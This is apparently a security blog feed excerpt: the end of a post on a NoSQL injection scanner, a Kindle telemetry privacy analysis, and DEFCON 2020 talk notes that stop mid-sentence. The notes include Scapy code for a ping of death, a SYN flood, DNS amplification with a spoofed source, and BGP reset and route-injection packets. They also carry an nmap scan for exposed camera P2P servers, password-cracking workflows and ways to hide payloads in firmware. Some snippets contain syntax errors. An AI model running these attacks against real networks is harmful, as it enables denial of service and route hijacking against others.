<!--kg-card-end: markdown--><h2 id="using-nosqli">Using NoSQLi</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/09/nosqli_demo_nosql_injection_scan.gif" class="kg-image" alt="NoSQLi - A Fast NoSQL Injection Scanner" loading="lazy" width="2048" height="934"><figcaption>nosql scanning using nosqli</figcaption></figure><p>I tried to keep a simple and flexible CLI interface for scanning. You can pass in a target URL with GET parameters that need to be scanned, or a saved request with POST data. The scanner is smart enough to know if the data is JSON or form data, and will inject either way.</p><p>The configurations currently support running through a proxy (so you can view the generated traffic in Burp or similar software) and changing the user agent.</p><h2 id="scanning-types">Scanning Types</h2><p>NoSQLi has the most commonly found injection vectors implemented:</p><p><strong>Error Scans: </strong>Look for known error strings in responses from the server.</p><p><strong>Blind Boolean Injections</strong>: When the page doesn&apos;t return errors, but does return different data when <code>true</code> or <code>false</code> is returned from the database (or when some records are retrieved vs. no records)</p><p><strong>Timing based injections</strong>: When all else fails, if the database sends a delayed response after a successful injection.</p><h2 id="using-nosqli-with-requests">Using NoSQLi with Requests</h2><p>A key feature missing from a few scanners I tried previously was the ability to export a request from a proxy and run the injections based on that. NoSQLi can leverage this easily, and keeps all the header information, including things like user agent.</p><p>While the tool does not yet support importing a full session log and executing tests against all requests sequentially, saving a standard HTTP request to a file and referencing that file allows repeatable tests, or extraction from other tools such as Burp.</p><h2 id="installing-nosqli">Installing NoSQLi</h2><p>The <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">github page</a> has all the instructions. You can build from source or download and run the appropriate <a href="https://github.com/Charlie-belmer/nosqli/releases?ref=nullsweep.com">executable</a> for your system.</p><h2 id="roadmap-future-features">Roadmap / Future features</h2><p>I&apos;d like to support data extraction and specific tests for NoSQL databases beyond MongoDB. If you have ideas, try it out and let me know what else you would like to see!</p>]]></content:encoded></item><item><title><![CDATA[Kindle Collects a Surprisingly Large Amount of Data]]></title><description><![CDATA[Reading a book on a Kindle sends Amazon a lot of data about reading habits. How fast pages are turned, font sizes and views, and device details.]]></description><link>https://nullsweep.com/kindle-collects-a-surprisingly-large-amount-of-data/</link><guid isPermaLink="false">5f3c070f34e139245355854d</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 25 Aug 2020 13:13:07 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1456953180671-730de08edaa7?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1456953180671-730de08edaa7?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Kindle Collects a Surprisingly Large Amount of Data"><p>As an avid reader, I&apos;ve owned several generations of Kindle devices, from the original to the Paperwhite, and loved each of them.</p><p>However, I have also kept a watchful eye on the abuse potential of the new format. Because Amazon technically owns the content you view, they may revoke it at any time. There have been cases of Amazon <a href="https://io9.gizmodo.com/amazon-secretly-removes-1984-from-the-kindle-5317703?ref=nullsweep.com">removing specific books</a> from customer accounts (and kindles). Considerably worse, there are also cases of Amazon revoking user accounts and <a href="https://www.bekkelund.net/2012/10/22/outlawed-by-amazon-drm/?ref=nullsweep.com">removing all access to purchased books</a>.</p><p>Kindle services leverage reading data to offer some nice features that traditional books can&apos;t offer: maintaining bookmarks and notes between devices, keeping all devices synced with the last read page, and more. It also shows ads and recommendations for next books to read on the kindle. </p><p>I was curious to know if the Kindle was only sending the data required for these services, or if other data about me was being sent.</p><h2 id="turns-out-kindle-collects-a-ton-of-data">Turns out, Kindle Collects a Ton of Data</h2><p>The Kindle sends device information, usage metadata, and details about every interaction with the device (or app) while it&apos;s being used. All of this is linked directly to the reader account.</p><p>Opening the app, reading a book, flipping through a few pages, then closing the book sends over 100 requests to Amazon servers. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/08/kindle_data_flows.png" class="kg-image" alt="Kindle Collects a Surprisingly Large Amount of Data" loading="lazy"><figcaption>Kindle data requests</figcaption></figure><h3 id="the-invasive-behavioral-information">The Invasive Behavioral Information</h3><p>Essentially, the Kindle tracks every tap and interaction someone makes while reading.</p><p>Every page that is read sends the following information:</p><ul><li>Time a page was opened (when you turn to a new page, a timestamp is generated)</li><li>The first character on the page (This might be something like character 7705 in the book, which is the exact location)</li><li>The last character on the page</li><li>If the page is images or text</li></ul><p>Here&apos;s a sample record that is sent with every page read:</p><!--kg-card-begin: markdown--><pre><code class="language-json">{
    &quot;created_timestamp&quot;: 1597743233808,
    &quot;payload&quot;: {
        &quot;context&quot;: &quot;Reading&quot;,
        &quot;continuous_scroll_state&quot;: &quot;disabled&quot;,
        &quot;end_position&quot;: 4708,
        &quot;is_scrolled_over_span&quot;: false,
        &quot;span_type&quot;: &quot;Text&quot;,
        &quot;start_position&quot;: 4193
    },
    &quot;schema_name&quot;: &quot;kindle_positions_consumed_v2&quot;,
    &quot;schema_version&quot;: 0,
    &quot;sent_timestamp&quot;: 1597743233855,
    &quot;sequence_number&quot;: 26
}
</code></pre>
<!--kg-card-end: markdown--><p>Every reading session will also generate a summary of how many pages were read in different modes:</p><!--kg-card-begin: markdown--><pre><code class="language-json">{
    &quot;created_timestamp&quot;: 1597743255324,
    &quot;payload&quot;: {
        &quot;action_type&quot;: &quot;PageTurn&quot;,
        &quot;book_length&quot;: 2003478,
        &quot;context&quot;: &quot;Reading&quot;,
        &quot;count&quot;: 10,
        &quot;navigation_end_location&quot;: 7884,
        &quot;navigation_mode&quot;: &quot;Horizontal&quot;,
        &quot;navigation_start_location&quot;: 3599
    },
    &quot;schema_name&quot;: &quot;reader_in_book_navigation_v2&quot;,
    &quot;schema_version&quot;: 0,
    &quot;sent_timestamp&quot;: 1597743265854,
    &quot;sequence_number&quot;: 36
}
</code></pre>
<!--kg-card-end: markdown--><p>Similar data sets are sent for opening the app, whether it is in the background when opened, when a book is opened or closed, and when settings like font size are changed. Highlighting or tapping any word will send the requests with the text to Bing Translate and Wikipedia, as well as back to Amazon.</p><p>None of these requests appear to be used for customer features like last read location. Instead, the highlights, last read location, and other information is sent a second time, to a different endpoint, on a periodic basis, with much less granular information.</p><p>Each request also isn&apos;t sent as soon as it&apos;s generated. A number of these records are created and stored locally, then uploaded (note the sequence_number field). Even if a person is offline while reading, this data is stored and sent when reconnected.</p><h3 id="device-information">Device Information</h3><p>The Kindle also includes a few more bits of personal information I would rather it didn&apos;t:</p><ul><li>Country of residence</li><li>Attempt to get the IP address on the local network (a 10. address, which was incorrect for me)</li><li>device information and version (screen sizes, make and model (iphone vs. Android vs. Kindle), software version</li><li>Good Reads account details</li><li>Device orientation (portrait vs. landscape)</li></ul><p>Some of this is likely to help Amazon understand how users use the app, so they can improve it for those use cases. The local IP is the only item on here that bothers me, though I couldn&apos;t find any other local network information that would be problematic.</p><h2 id="conclusions">Conclusions</h2><p>The Kindle is far from the most invasive privacy app I have seen, but it records a lot of behavioral reading information I don&apos;t like. I&apos;ve been trying to get away from the the Kindle ecosystem for the past year or so, and now use <a href="https://apps.apple.com/us/app/marvin-3/id1086482858?ref=nullsweep.com">Marvin</a> for reading on my iPhone. I no longer use the Kindle device, though I dearly miss e-Ink.</p><p>Unfortunately, in order to use a non-Kindle application, I have to buy DRM-Free books. It isn&apos;t always easy to find them, though the Kobo bookstore and small niche providers often offer them, and some can even be found on Amazon.</p>]]></content:encoded></item><item><title><![CDATA[DEFCON 2020 Live Notes]]></title><description><![CDATA[Notes from various DEFCON talks, conversations, and Q&A sessions.]]></description><link>https://nullsweep.com/defcon-2020-live-notes/</link><guid isPermaLink="false">5f2bd7b3fec4c20515762288</guid><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 06 Aug 2020 11:15:07 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1510915228340-29c85a43dcfe?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1510915228340-29c85a43dcfe?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="DEFCON 2020 Live Notes"><p>I&apos;m taking some time to attend <a href="https://defcon.org/?ref=nullsweep.com">DEFCON</a> virtually this year. I&apos;ll be posting notes from talks, Q&amp;A, and maybe even take aways from &quot;hallway&quot; conversations I have here throughout the weekend.</p><p>I tend to focus mostly on webappsec, cloud security, and new exploits, but there are some interesting talks outside of my area of expertise I hope to find time for as well.</p><h2 id="sunday-august-9th">Sunday August 9th</h2><h3 id="bytes-in-disguise-_-">Bytes in Disguise (&#x2310;&#x25A0;_&#x25A0;)</h3><p><a href="https://www.youtube.com/watch?v=KDo3CExd8Ns&amp;ref=nullsweep.com">Video</a></p><p>This talk by Mickey Shkatov and Jesse Michael talks about various places to hide bytes so endpoint protection is unlikely to find them - some very interesting places! <a href="https://github.com/HackingThings/BytesInDisguise?ref=nullsweep.com">Github for their demos</a></p><ul><li>Covering previous talk about keeping malware / payloads off disk (to avoid AV), in memory, and in particular in UEFI. This made EDR and AV blind to the UEFI variables.</li><li>Where can we hide payload data so the time to detect is longer? UEFI Set/GetFirmwareEnvironmentVariable*, UEFI RT services.</li><li>To enumerate attack surface: take apart the device and take hi res photos (decent cell camera works) of the various hardware chips (can also try Googling teardown images of the model). Look for official schematics if possible (though finding schematics for modern hardware is rare). Find official docs that describe volatile and non volatile memory components - google hack: <code>&quot;flash&quot; + &quot;of volatility&quot; filetype:pdf</code>. You may find things like &quot;128 bytes are protected by intel. The other 128 bytes are not write-protected&quot;. But don&apos;t take the documents at their word (especially when it declares something as not user modifiable - usually that means it is intended for user modification, but may not be write protected).</li><li>Some places to hide bytes: CMOS, SPI, SPD, USB controllers, PCI bridges &amp; endpoint devices, Displays/monitors, track/touch-pads</li><li>CMOS: tiny non-volatile RAM backed by coin cell battery, located inside chip-set. Has a few unused bytes that are accessible via IO ports, but only 256 bytes and risk of bricking the system or disrupting PCR measurements (only mess with 0 value bytes). <a href="https://youtu.be/KDo3CExd8Ns?t=1367&amp;ref=nullsweep.com">Demo bookmark</a></li><li>SPI Flash: includes BIOS/UEFI, ME firmware, config data, platform specific regions and more. Often protected in modern systems, but sometimes permissions are not correct, or the permissions themselves are writable.</li><li>SPD: Serial presence detect chip - the chip in a replaceable memory chip that notifies the system how to use it. It includes info about the memory module, and usually has unused space that is sometimes writable (read at boot, so overwriting values may brick the system until module is removed). May not exist on systems with soldered memory. Usually only 256-512 bytes available.</li><li>USB controllers, often on the motherboard with update-able firmware (a large number have unsigned updates). <a href="https://youtu.be/KDo3CExd8Ns?t=2053&amp;ref=nullsweep.com">Demo bookmark</a>. You can likely find similar spaces on most attached devices that have firmware (most of them). LAN ports are usually a good spot to look as well.</li><li>How do we access SPI flash? the &apos;flash programming tool&apos; (may require some digging to find), firmware update tools from vendors. <a href="https://youtu.be/KDo3CExd8Ns?t=2773&amp;ref=nullsweep.com">Demo bookmark</a>. Even signed firmware images often only validate the block of data used - empty space not included.</li><li>Nearly all of this requires admin / Ring 0</li><li>Recommended <a href="https://github.com/smx-smx/ASMTool?ref=nullsweep.com">ASMio</a> tool by Stefano Moioli (leveraged in some of the demos)</li></ul><h4 id="lateral-movement-and-privilege-escalation-in-gcp">Lateral Movement and Privilege Escalation in GCP</h4><p><a href="https://www.youtube.com/watch?v=Z-JFVJZ-HDA&amp;ref=nullsweep.com">Video</a></p><p>This talk by Allison Donovan and Dylan Ayrey covers GCP attack techniques. I am interested in cloud security, but don&apos;t have any real experience with GCP.</p><ul><li>AWS has policies for users, GCP has policies for resources. Owner of a service account can&apos;t read the resource policies or even know if they have access. As a result, it isn&apos;t possible to know what a given user has access to - instead you have to look at a resource and see who has access to it. Service accounts can be granted access to resources from outside the organization (meaning it&apos;s really not possible to know what a given user has access to).</li><li>An interesting scenario covered with GKE (Kubernetes) - admin creates a cluster with a service account, service account manages nodes. Devs given access to specific nodes, but if a developer grants the Kubernetes service account access to some resource the dev owns (so their node can access their resource), but this grants all nodes access that resource, meaning any developer can access it, including ones added in the future - but the Kubernetes admin who owns the service account cannot know what resources have been granted! Sounds like a problem...</li><li>Most resources are grouped into orgs which have inheritance. So, realistically, in the above scenario, you would end up with entire project level role bindings.</li><li>This all means that granting anyone access to a service account is inherently risky -It is hard to really know what permissions that role has, unless you introspect all your own resources.</li><li>They mapped out orgs from IAM entries committed into github to generate an org graph.</li><li>Primitive editor role is pretty powerful - has a lot of default permissions - to associate service accounts to resources, and this role is created by default on resource creation. </li><li>Resources default to thousands of permissions.</li><li>So how do we use this to move laterally in an organization? If a developer gives a permission with an act-as permission to something like the editor role. </li><li><a href="https://youtu.be/Z-JFVJZ-HDA?t=1309&amp;ref=nullsweep.com">Demo</a>: From a base identity via phishing, they use project listing, service accounts, and actas permissions to take control of service accounts. </li><li>Major finding: if you have one service account with editor access on a project, and another service account with owner on that project, the editor level service account can <em>always</em> privilege escalate itself to owner. This is also true for developers with editor level!</li><li>If one of the lateral moves hits an org role binding, can be used to get org access due to inheritance.</li><li>Released tool <a href="https://github.com/dxa4481/gcploit?ref=nullsweep.com">Gcploit</a> to automate this flow.</li><li>Remediation: defensive script to map out the same flow that an attacker could exploit. Also, GCP IAM analyzer to analyze this (result of these findings)</li><li>Also released some monitoring tools to identify someone using this tool in an environment.</li></ul><h3 id="take-down-the-internet-with-scapy">Take down the internet with Scapy</h3><p>This was a live session by John Hammond</p><p>I have used Scapy for many interesting things, but nothing too serious, so I was interested to see what else it could do. This talk is mostly about using Scapy to craft DoS attacks, old and new.</p><ul><li>What kind of disruptive attacks could be done? Goal of this talk is to describe attacks that just recklessly break things, and show how easy it is.</li><li>Scapy is a packet crafting library for python - formulate TCP or UDP packets, CANbus, Bluetooth, and others.</li><li>some basic syntax to ping and print response. It builds an ICMP packet and sends it to <code>dst</code>.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">from scapy.all import *
ping = IP(dst=&quot;192.168.1.1&quot;)/ICMP()
print(ping)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Ping of death attack: DoS by sending ping packets that are larger than the maximum allowable size. Scapy script: <code>send(fragment(IP(dst=&quot;192.168.10.5&quot;)/ICMP()/(&quot;X&quot;*60000)))</code> Some systems still vulnerable to this, though it&apos;s a pretty old and out-dated attack.</li><li>Syn Flood: try to consume all open TCP connections on a server by sending SYN&apos;s but no SYNACK&apos;s so the connection is left open by the server for a short time.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">syn_flood = IP(dst=&quot;192.168.1.1&quot;, id=1111, ttl=99)/
            TCP(sport=RandShort(), dport=[80], seq=12345, ack=1000, window=1000, flags=&quot;S&quot;)  # &quot;S&quot; flag indicates syn
answered, unanswered = srloop(syn_flood, inter=0.3, retry=2, timeout=4)
</code></pre>
<!--kg-card-end: markdown--><ul><li>DNS amplification attack: DoS based on DNS resolver reflection. Basically, requesting a DNS entry (with a spoofed source IP to the victim) so that they get many large DNS responses. (here <code>src</code> is the victim IP). I am not sure how well this works with modern networks because IP spoofing is largely blocked by networks at every hop, unless the victim is on the same network or geographically close.</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">dns_amp = IP(src=&quot;192.168.10.5&quot;, dst=&quot;dns.nameserver.com&quot;)/UDP(dport=53)/
          DNS(rd=1, qd=DNSQR(dst=&quot;google.com&quot;, wtype=&quot;ANY&quot;))  # send ANY type to get max response size

send(dns_amp)
</code></pre>
<!--kg-card-end: markdown--><ul><li>BGP Abuse - BGP Hijacking, DoS, blind attacks to disrupt sessions or inject routing mis-configurations.</li><li>Blind disruption - RST flag spoofed, victim would believe the BGP session was terminated. (to achieve this, attacker has to be betwwen the two routers)</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">dport = 53154 # must match active session
seq_num = 123 # must also match traffic
ack_num = 456 # must also match traffic

bgp_reset = IP(src=&quot;200.1.1.1&quot;, dst=&quot;200.1.1.3&quot;, ttl=1)/
            TCP(dport=dport, sport=179, flags=&quot;RA&quot;, seq=seq_num, ack=ack_num)
            
send(bgp_reset)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Blind injection of BGP - send malicious routing information to try and hijack the route</li></ul><!--kg-card-begin: markdown--><pre><code class="language-python">load_contrib(&quot;bgp&quot;)

dport = 53154
seq_num = 123
ack_num = 456

path_origin=BGPPathAttribute(flags=0x40, type=1, attr_Len=1, value=&quot;\x00&quot;)
path_AS = BGPPathAttribute(flags=0x40, type=2, attr_Len=4, value=&quot;\x02\x01\x01\x2c&quot;)
path_next = BGPPathAttribute(flags=0x40, type=3, attr_Len=4, value=&quot;\x64\x02\x03\x02&quot;)
path_exit = BGPPathAttribute(flags=0x80, type=4, attr_Len=4, value=&quot;\x00\x00\x00\x00&quot;)
path_update = BGPPathAttribute(tcp_Len=25, total_path=[path_origin, path_AS, path_next, path_exit], nlri=[(24, &quot;5.5.5.0&quot;)])

send(IP(src=&quot;200.1.1.1&quot;, dst=&quot;200.1.1.2&quot;, ttl=1)/
        TCP(dport=dport, sport=179, flags=&quot;PA&quot; seq=seq_num, ack=ack_num)/
        BGPHeader(Len=52, type=2)/path_update)
</code></pre>
<!--kg-card-end: markdown--><ul><li>Real life cases: June 2019, Verizon has BGP routing miss that knocked about 15% of traffic off the internet. Cloudflare BGP leak last month from cloudflare. Neither of these were attacks, just network mis-configurations.</li></ul><h3 id="modern-password-hash-cracking">Modern password &amp; hash cracking</h3><p>This is a live talk</p><ul><li>Gaming setups are best - GPU important. Cloud cracking can work well, about $.03 / Giga-hash hour. Built custom rig for $25k which gets 250 GH/hr (2017) - 6 x 1080&apos;s</li><li>8 char passwords can be cracked near instantly with one of these - should not be used in 2020. 12 char is now the minimum - 3 year crack time on NTLM hash (when not in word list)</li><li>Some terms: <strong>masks</strong> - the makeup of a word broken up into it&apos;s charcter set. Like Password1 -&gt; &lt;P&gt;&lt;assword&gt;&lt;1&gt; - 3 masks, which can be used to guess the makeup of characters. Most people start their password with capital letter, then lowercase, and ending with numbers. <strong>Hybrid attack</strong> - brute force or mask appended/prepended to a wordlist. <strong>Wordlist</strong> - candidate words which can be modified with rules - usually dictionary words. <strong>Password Dump</strong> - file containing passwords found by previous cracking attempts - more complex words than a wordlist.</li><li>Full kit: hashcat, hashtopolis, HashID, PW_spy</li><li><a href="https://hashcat.net/hashcat/?ref=nullsweep.com">Hashcat</a>: defacto standard, replaced JohnTheRipper. Supports almost every hash imaginable and very fast. </li><li><a href="https://github.com/s3inlc/hashtopolis?ref=nullsweep.com">Hashtoplis</a>: wrapper for hashcat that manages agents, jobs, wordlists and binaries from a central location. give it something to crack and it farms it out to various hashcat instances. Can help manage all the hashcat installs as well. This is really for the big enterprise engagements (cost of running multiple cloud jobs can be high)</li><li><a href="https://pypi.org/project/hashID/?ref=nullsweep.com">HashID</a> - find the likely hashing algorithm if you are having trouble finding the type of hash, but not so helpful anymore. Another method is to self-register with a password, grab the hash that was created, and then try different methods.</li><li><a href="https://github.com/lwangenheim/pw_spy?ref=nullsweep.com">PW_spy</a> - once some pw&apos;s have been cracked will find most common masks, weak passwords, common lengths, base words used in cracked set.</li><li>Where to find passwords? hashdump for local accounts, /etc/shadow, mimikatz, web apps, responder, DCSync/NTDS, network snooping...</li><li>some common password themes: local sports team (pro/college), local street names, &lt;company_name&gt;&lt;year_founded&gt;, sometimes client or project names</li><li>cracking progression (fastest first): Start with strong wordlist -&gt; add rules -&gt; loopback attacks -&gt; 1-8 char pw brute force (24 hours for NTLM) -&gt;masks.</li></ul><h2 id="saturday-august-8th">Saturday August 8th</h2><h3 id="whispers-among-the-stars-satellite-eavesdropping-">Whispers Among the Stars (Satellite Eavesdropping)</h3><p><a href="https://www.youtube.com/watch?v=ku0Q_Wey4K0&amp;ref=nullsweep.com">Video</a></p><p>This is a great talk by James Pavur on intercepting satellite data. The scope and scale of the findings are significant.</p><ul><li>Attack looked at 18 Geo satellites, covering 100m KM (huge area!)</li><li>Able to intercept a lot of sensitive data - sometimes using vulnerabilities known since 2005. Traffic captured from military jets, industrial work, personal internet traffic, and more.</li><li>Main problem with satellite communications: initial request generally a very focused band (limited geo), but response send a very spread out geographic area, so many locations can be used to listen. </li><li>Sat equipment is expensive - but TV sat dish works (~$300) with sat card (pro card about $300 also), so not too expensive for every day attackers.</li><li><a href="http://ebspro.net/?ref=nullsweep.com">EBS Pro</a> tool used to scan for internet service - check the KU band, look for signal out of the noise (looked like big spikes on the demo) and tell the card to connect at that frequency looking for digital. The driver can then be used to listen into the wire, and the saved traffic file can be greped to find info. In the demo - SOAP API was being sent.</li><li>Legacy protocol used is MPEG-TS (the video streaming format), though this is still used fairly frequently. There are some good tools for working with: dvbsnoop, tsduck, TSReader.</li><li>Modern protocol: GSE. Popular with enterprise customers, with high end hardware that made it hard for the low end tools used to capture all the data.</li><li>Built <a href="https://github.com/ssloxford?ref=nullsweep.com">GSExtract</a> tool (not released at the time of these notes) to try to reconstruct IP packets from the feed - gives 60-70% of packets. &#xA0;</li><li>Combined, this gives ISP level visibility to traffic. With enterprise customers, it is often treated as a trusted LAN communication, including finding some things like LDAP traffic - some companies, including utility companies, considered the satellite as a trusted network.</li><li>Encryption would protect the content of the traffic, but some things that were intercepted: most DNS queries, HTTP headers, emails (intercepted attorney/client communication emails using POP3). This can allow things like password reset attacks by intercepting emails. BASIC auth strings, FTP with login details, SMB, cruise ship point of sale data, passport/visa data from ports, along with timestamps.</li><li>Aviation findings: GSM cell connections sent clear text over satellite, leading to some text message intercepts and some air control data.</li><li>Satellite communications could be used for undetectable data exfiltration - send data via satellite - even to something like a closed port or broken service on a ship somewhere, and the attacker can listen in.</li><li>TCP session hijacking - depending on location of the attacker and the user, the attacker may be able to have certainty that their packets will arrive first.</li><li>It is likely that nation states employ satellite technology that can expand significantly upon these attacks.</li></ul><h3 id="using-p2p-to-hack-3-million-cameras">Using P2P to hack 3 million cameras</h3><p><a href="https://www.youtube.com/watch?v=Z_gKEF76oMM&amp;ref=nullsweep.com">Video</a></p><p>A really great talk by Paul Marrapese on how P2P features in cameras exposes them to attack, including cameras behind firewalls. This one is scary - attacks are generally simple, persistent, and unlikely to go away any time soon.</p><ul><li>Hundreds of brands impacted by his findings - a $40 device can be used to accomplish this.</li><li>Paul purchased a highly rated IP camera from Amazon and plugged it in, noticing that it could be viewed from his phone before setting up his firewall rules. Initial analysis: wireshark shows communications to 3 different servers across the globe, and the video feed sometimes going to other states. </li><li>How was it bypassing his network? Using Peer to peer. Most cameras use third party P2P libraries.</li><li>By design, P2P is meant to be exposed to internet, and can&apos;t be turned off on most devices. It does this by sending UDP packets through the NAT to the P2P server. The firewall will allow returning traffic by design. Other clients can use the same technique to open their own firewall. When the server returns the device IP/port, the same technique can be used to create direct communication (UDP hole punching).</li><li>Manufactures leverage some devices as relays (common in P2P as super nodes), which can&apos;t be opted out of.</li><li>For more fun, you can get direct access to any device if you have UID (which is guessable), and generally run ARM based BusyBox with every service as root.</li><li>P2P servers are the gateway to the clients to orchestrate connections. Manufactures keep dedicated servers for their own devices - usually listening on UDP port 32100.</li><li>Most users connect via a device unique ID (UID), which is all that&apos;s needed to connect. Written to NVRAM during manufacturing, so unchangeable. UID has three parts - prefix-serial-checkCode</li><li>Wireshark <a href="https://github.com/pmarrapese/iot?ref=nullsweep.com">P2P dissector</a> released to help look at the traffic (protocol details in talk)</li><li>Find P2P servers by scanning cloud providers with NMAP UDP probes. Add <code>udp 32100 &quot;\xf1\x00\x00\x00&quot;</code> to <code>/usr/share/nmap/payloads</code> and scan with <code>nmap -n -sn -PU32100 --open -iL ranges.txt</code> will run the scan.</li><li>Prefixes can be brute forced - P2P servers will respond with errors for invalid prefixes. He found about 488 distinct prefixes. Serial numbers are just sequential numbers. Check code is a modified Md5 (via finding iLnkP2P library).</li><li>Most devices use default password, so UID is enough to access. </li><li>Found buffer overflow without any overflow protections enabled, allows RCE to root shell.</li><li>Interestingly, using that shell to get the MAC address and then giving the MAC to google geo location gives very accurate lat/long results.</li><li>MitM also possible - with UID, forge login message to P2P service to have traffic routed to you instead of real device. Majority of IoT traffic not encrypted, log message &apos;encrypted&apos; with Base64... </li><li>Even easier MitM is to get a camera that becomes a super node in the P2P network... UID&apos;s leaked, and not detectable to users.</li><li>Some of these things are being fixed by vendors, or have released patches, but it&apos;s unlikely users will patch.</li></ul><h3 id="online-ads-as-recon-and-surveillance-tool">Online ads as recon and surveillance tool</h3><p>This is a live talk in the crypto and privacy village.</p><p>Niel explores the possibility of using ad networks to harvest information about specific known targets.</p><ul><li>Previous research could use ads to tell if someone is blue team (with limitations) - for instance take out ads against specific hashes found in malware, then see who makes the search</li><li>Trying to detect if it is possible to setup ads so it targets a specific individual, and if so, is it practical to do so.</li><li>Scenario: Blue team user with Nexus 6 android and windows 10 VM, google/chrome user. Doesn&apos;t clear cookies. Attacker has a domain name, blog, business for advertising, and some accounts and VM&apos;s.</li><li>Attacker puts some very specific search terms into a blog post (in this case, a bitcoin address, trojan string, with some other terms like not petya)</li><li>Attacker wants to detect user search for specific terms - design ad with select low volume terms (but above the minimum threshold activity). Then narrow via demographics, but again not too narrow</li><li>Eventually ad will show - if shown attacker gets full text of query that triggered the ad. </li><li>This is not all that viable - not able to do very low volume terms, ads don&apos;t reliably display when you want, potential to have higher cost.</li><li>Facebook allows much more detailed audience targetting, along with logical operands (AND/OR/XOR) - target interests, user data like life events, food/drink types, hobbies, etc. Behaviors most invasive - online + offline data, OS&apos;s, purchase behavior, travel, multicultural affinities, expat, draws on data collected from user devices, location. When combined can target very specific audiences.</li><li>Using include/exclude rules with location, you can target for instance everyone who has recently been in the US capital building.</li><li>With facebook - it didn&apos;t trigger for the intended target, but did trigger for other users.</li><li>Not fully proven, but seems that it is possible to gather information about a specific person by using multiple methods like re-targeting, and highly specific targeting.</li><li>Defensive measures: Use opsec on search engines, be wary of data shared from devices (location on Android), etc.</li></ul><h3 id="hackium-browser">Hackium Browser</h3><p>I joined this talk by Jarrod Overson a little late (<a href="https://www.youtube.com/watch?v=VpLghyPdte0&amp;ref=nullsweep.com">video</a>). This is an incredibly interesting tool that looks like it can significantly help with JavaScript de-obfuscation, reverse engineering, and automatic manipulation of sites.</p><ul><li><a href="https://github.com/jsoverson/hackium?ref=nullsweep.com">Hackium</a> (and related tools) help you to better understand how sites are using JS and the business logic built in. It&apos;s a Nodejs library - can be installed with <code>npm install -g hackium</code></li><li>hackium exposes a repl. It&apos;s based on Puppeteer, so any commands for Puppeteer or hackium work within it. REPL history is stored in .repl_history so it can be shared with others. This enables some nice ability to share cool manipulations of sites that goes beyond standard dev tool / proxy modifications. You can also use <code>hackium init</code> to create a shareable config file.</li><li>Designed so that supposedly human events (mouse, keyboard) are built to look human - mistakes, proper mouse movement, variable timings between key presses.</li><li>Can wire in captcha solving services like 2captcha to auto-solve captchas that may block the tool.</li><li>Interceptors: templates to format JS or shift-refactor (transform nodes of a JavaScript syntax tree) - can be used to make JS more readable or dynamically change how the page works at load.</li><li>A cool demo that shows how to de-obfuscate JS by dynamically replacing the obfuscated code using shift-refactor.</li><li>A cool demo to find and expose internal JS functions on twitters page that allows </li></ul><h3 id="differential-privacy">Differential Privacy</h3><p>A talk by Miguel Guevara and Bryan Gipson about how to leverage and share useful data without compromising privacy.</p><ul><li>Google has made their <a href="https://github.com/google/differential-privacy?ref=nullsweep.com">differential privacy library</a> open source (speakers are from Google)</li><li>Core problem: how do we publish data in a way that preserves specific users privacy?</li><li>Removing PII is not enough - publishing de-identified records could be reconstructed by combining with other data sources.</li><li>Aggregation or k-anonymity (at least k users in a given data set), but this may not be enough if stats change over time in ways that expose information, such as a single user moving from or to an aggregation bucket. This could also be a problem if the bucket is sensitive (like a medical condition). Published data may be subject to differencing attacks, knowing someone is part of a bucket may be a problem, people could be exposed if known bad data is injected - like 100 users in a bucket with 99 fake users.</li><li>If we aggregate, but inject some randomness into each aggregate value - this is the differential privacy idea. Maintain statistical significance, without above risks. </li><li>Practical aspects they take into account: a person can only be counted once in each metric, to avoid specific patterns (person A went to the grocery store 100 times today). Remove noisy metrics.</li><li>Built a differential privacy sql engine, allowing querying a data set while maintaining privacy by applying per user transformations that affect joins and aggregations. </li></ul><h2 id="friday-august-7th">Friday August 7th</h2><h3 id="when-tls-hacks-you">When TLS Hacks You</h3><p><a href="https://www.youtube.com/watch?v=qGpAJxfADjo&amp;ref=nullsweep.com">Video</a></p><p>An interesting expansion on SSRF that enables new techniques for weaponizing SSRF when it doesn&apos;t appear exploitable, leveraging TLS fields containing payloads. Talk by Joshua Maddux.</p><ul><li>Initial demo is interesting - localhost running memcache and making a simple Curl request adds an attacker controlled cache entry.</li><li>Turns out we can smuggle some data in the TLS handshake packets - SessionID (32b) and Session Tickets (65kb). These are saved between sessions to the same domain name (regardless of IP address). </li><li>Full attack: setup site that crafts handshake with the payload in one of the fields above, and DNS that flips between actual site and localhost:port of vulnerable service, like memcache. SSRF the app to have it create a TLS connection to vulnerable site. Now, the server has cached the session information for attackerSite, but the next SSRF request has the DNS resolve to localhost.</li><li>Payload will be sent with the client HELO to the localhost service as a result. Payload can include arbitrary characters like new lines, including memcached commands, de-serialization attacks, etc.</li><li>Vulnerable sites: Those that have SSRF (which may have previously been unexploitable, 